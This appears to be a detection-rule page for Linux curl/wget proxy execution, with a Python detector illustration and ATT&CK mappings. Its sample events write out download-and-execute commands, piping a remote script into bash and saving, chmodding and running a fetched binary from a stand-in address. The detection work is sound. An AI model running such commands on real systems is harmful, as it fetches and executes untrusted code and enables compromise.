
Summary
This rule targets the execution of the curl or wget binaries as part of a GTFOBins technique on Linux systems. Attackers may leverage these commonly trusted utilities to download malicious files from the internet and execute them, often to avoid detection by typical security measures. The rule focuses on commands executed directly from the binary rather than through a spawned shell, a pattern that can be used to stay stealthy. It uses a sequence detection over process-event attributes to identify curl or wget being executed through legitimate-sounding utilities, known as living-off-the-land binaries (LoLBins). Specifically, it monitors the process command line for characteristics that indicate proxy execution: piping the downloaded content into a shell, specifying output flags for the downloaded content, and attempts to connect to unusual destinations. Investigation involves examining the surrounding process and filesystem activity, correlating any outbound connections with threat intelligence to assess their legitimacy, and searching for further suspicious activity that may indicate an ongoing compromise.
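The following is an added illustration of the detection logic the summary describes, written for this page and not part of the rule itself or of any detection product. It runs the three command-line checks (pipe into a shell, output flag, non-allowlisted destination) over constructed process events and adds a simple sequence step: a later process that references a file path written by a flagged download is also reported. The allowlist of trusted hosts, the event fields, the sample command lines and the reason labels are all assumptions made for the example.

```python
"""Illustrative curl/wget proxy-execution detector (example code, not the rule's own logic)."""
import re
import shlex
from dataclasses import dataclass
from typing import Iterable, List, Optional

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
DOWNLOADERS = {"curl", "wget"}
# Flags that write the retrieved content to disk (curl -o/--output, wget -O/--output-document/-P).
OUTPUT_FLAGS = {"-o", "-O", "--output", "--output-document", "-P"}
# Constructed allowlist; a real deployment would source this from an asset inventory.
TRUSTED_HOSTS = {"mirror.example.internal", "repo.example.internal"}
URL_RE = re.compile(r"https?://([^/\s:]+)")


@dataclass
class ProcessEvent:
    pid: int
    name: str
    command_line: str


@dataclass
class Finding:
    pid: int
    reasons: List[str]


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def _split_args(stage: str) -> List[str]:
    try:
        return shlex.split(stage)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        return stage.split()


def analyze_command_line(cmd: str) -> List[str]:
    """Return the proxy-execution indicators found in one command line ([] if none)."""
    argvs = [a for a in (_split_args(s) for s in cmd.split("|")) if a]
    if not argvs or _basename(argvs[0][0]) not in DOWNLOADERS:
        return []
    first = argvs[0]
    reasons = []
    # 1) downloaded content is piped straight into a shell interpreter
    if any(_basename(a[0]) in SHELLS for a in argvs[1:]):
        reasons.append("pipe_to_shell")
    # 2) an output flag writes the content to disk for later execution
    if any(tok in OUTPUT_FLAGS or tok.startswith(("--output=", "--output-document="))
           for tok in first[1:]):
        reasons.append("writes_output_file")
    # 3) destination host is not on the allowlist
    for host in URL_RE.findall(cmd):
        if host not in TRUSTED_HOSTS:
            reasons.append("unusual_destination:" + host)
    return reasons


def extract_output_path(cmd: str) -> Optional[str]:
    """Return the file path a curl/wget output flag points at, if any."""
    first = _split_args(cmd.split("|")[0])
    if not first or _basename(first[0]) not in DOWNLOADERS:
        return None
    tool = _basename(first[0])
    for i, tok in enumerate(first):
        if tok.startswith(("--output=", "--output-document=")):
            return tok.split("=", 1)[1]
        if tok in ("-o", "--output", "--output-document") or (tool == "wget" and tok == "-O"):
            if i + 1 < len(first):
                return first[i + 1]
    return None


def detect(events: Iterable[ProcessEvent]) -> List[Finding]:
    """Sequence detection: flag suspicious downloads, then any process touching the written file."""
    findings = []
    downloaded = {}  # output path -> pid of the downloader that wrote it
    for ev in events:
        reasons = analyze_command_line(ev.command_line)
        if reasons:
            findings.append(Finding(ev.pid, reasons))
            path = extract_output_path(ev.command_line)
            if path:
                downloaded[path] = ev.pid
            continue
        argv = _split_args(ev.command_line)
        hits = [tok for tok in argv if tok in downloaded]
        if hits:
            findings.append(Finding(ev.pid, ["references_downloaded_file:" + hits[0],
                                             "downloaded_by_pid:%d" % downloaded[hits[0]]]))
    return findings


# Constructed sample events; 203.0.113.10 is a documentation address, not a real host.
SAMPLE_EVENTS = [
    ProcessEvent(101, "curl", "curl -fsSL https://mirror.example.internal/version.txt"),
    ProcessEvent(102, "curl", "curl -s http://203.0.113.10/payload.sh | bash"),
    ProcessEvent(103, "wget", "wget -q http://203.0.113.10/agent -O /tmp/.agent"),
    ProcessEvent(104, "chmod", "chmod +x /tmp/.agent"),
    ProcessEvent(105, ".agent", "/tmp/.agent --daemon"),
    ProcessEvent(106, "wget", "wget https://repo.example.internal/index.html"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.pid, ", ".join(f.reasons))
```

Events 101 and 106 produce no finding because they reach allowlisted hosts without an output flag or pipe; 102 and 103 match the command-line checks, and 104 and 105 are reported only because they reference the path that 103 wrote, which is the sequence aspect the summary refers to. A production rule would tune the output-flag check against known package-management and CI activity before relying on it alone.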
Categories
- Linux
- Endpoint
Data Sources
- Process
- Network Traffic
- Application Log
ATT&CK Techniques
- T1218
- T1059
- T1059.004
Created: 2025-11-20